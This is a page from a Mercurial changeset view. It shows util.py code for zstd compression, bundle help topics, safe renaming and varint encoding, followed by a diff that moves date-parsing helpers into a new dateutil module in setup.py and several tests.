        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            # Module missing: engine reports itself unavailable below.
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        # Byte prefix identifying zstd-compressed revlog chunks.
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            # compressobj may buffer internally and emit nothing for a chunk.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            # Recommended chunk sizes published by the zstd bindings.
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            """Compress ``data``; return None when storing raw is better.

            A None return signals the revlog to store the chunk
            uncompressed (tiny inputs, or when compression doesn't shrink
            the payload).
            """
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small for compression to pay off.
                return None

            elif insize <= 1000000:
                # One-shot compression for modest payloads.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Large payloads: feed in recommended-size chunks to bound
                # memory usage.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            """Decompress a zstd frame, raising RevlogError on any failure."""
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
4167
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help.

    Returns a dict mapping bundle-type name to a dummy object whose
    ``__doc__`` is the formatted help text for that compression engine.
    """
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        # Skip engines whose backing module is not installed.
        if not engine.available():
            continue

        bt = engine.bundletype()
        # Engines with no declared bundle name are not user-selectable.
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        # Keep the originals around for i18n extraction/marking below.
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

# Evaluated at import time so the docstrings are registered for translation.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
4204
def safename(f, tag, ctx, others=None):
    """Return a collision-free rename target for ``f``.

    The result has the form ``f~tag`` or ``f~tag~N`` and is guaranteed
    not to exist in the given context and not to appear in the optional
    set of additional reserved names.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in
    """
    if others is None:
        others = set()

    def _unused(candidate):
        # A name is usable only if it is absent from both namespaces.
        return candidate not in ctx and candidate not in others

    candidate = '%s~%s' % (f, tag)
    if _unused(candidate):
        return candidate
    # Append an increasing numeric suffix until a free name is found.
    for n in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, n)
        if _unused(candidate):
            return candidate
4227
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    if len(data) >= n:
        return data
    # A short read means the stream was truncated mid-record.
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (len(data), n))
4236
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    out = []
    # Emit 7-bit groups least-significant first; every group except the
    # final one carries the 0x80 continuation bit.
    while True:
        group = value & 0x7f
        value >>= 7
        if value:
            out.append(pycompat.bytechr(0x80 | group))
        else:
            out.append(pycompat.bytechr(group))
            return ''.join(out)
4273
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    # Each byte contributes 7 payload bits, least-significant group first;
    # a clear high bit marks the final byte.
    for shift in itertools.count(0, 7):
        byte = ord(readexactly(fh, 1))
        result |= (byte & 0x7f) << shift
        if not (byte & 0x80):
            return result
@@ -809,6 +809,7 b" packages = ['mercurial',"
809 809 'mercurial.pure',
810 810 'mercurial.thirdparty',
811 811 'mercurial.thirdparty.attr',
812 'mercurial.utils',
812 813 'hgext', 'hgext.convert', 'hgext.fsmonitor',
813 814 'hgext.fsmonitor.pywatchman', 'hgext.highlight',
814 815 'hgext.largefiles', 'hgext.lfs', 'hgext.narrow',
@@ -13,8 +13,8 b' from mercurial import ('
13 13 extensions,
14 14 policy,
15 15 registrar,
16 util,
17 16 )
17 from mercurial.utils import dateutil
18 18
19 19 configtable = {}
20 20 configitem = registrar.configitem(configtable)
@@ -49,7 +49,7 b' def fakewrite(ui, func):'
49 49
50 50 # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between
51 51 # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy
52 fakenow = util.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
52 fakenow = dateutil.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
53 53
54 54 orig_pack_dirstate = parsers.pack_dirstate
55 55 orig_dirstate_getfsnow = dirstate._getfsnow
@@ -7,8 +7,8 b' from mercurial import ('
7 7 extensions,
8 8 patch as patchmod,
9 9 registrar,
10 util,
11 10 )
11 from mercurial.utils import dateutil
12 12
13 13 configtable = {}
14 14 configitem = registrar.configitem(configtable)
@@ -30,7 +30,7 b' def internalpatch(orig, ui, repo, patcho'
30 30 if fakenow:
31 31 # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between
32 32 # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy
33 fakenow = util.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
33 fakenow = dateutil.parsedate(fakenow, [b'%Y%m%d%H%M'])[0]
34 34 for f in files:
35 35 repo.wvfs.utime(f, (fakenow, fakenow))
36 36
@@ -4,6 +4,7 b' Tests for the journal extension; records'
4 4 > # mock out util.getuser() and util.makedate() to supply testable values
5 5 > import os
6 6 > from mercurial import util
7 > from mercurial.utils import dateutil
7 8 > def mockgetuser():
8 9 > return 'foobar'
9 10 >
@@ -19,7 +20,7 b' Tests for the journal extension; records'
19 20 > return (time, 0)
20 21 >
21 22 > util.getuser = mockgetuser
22 > util.makedate = mockmakedate
23 > dateutil.makedate = mockmakedate
23 24 > EOF
24 25
25 26 $ cat >> $HGRCPATH << EOF
General Comments 0
You need to be logged in to leave comments. Login now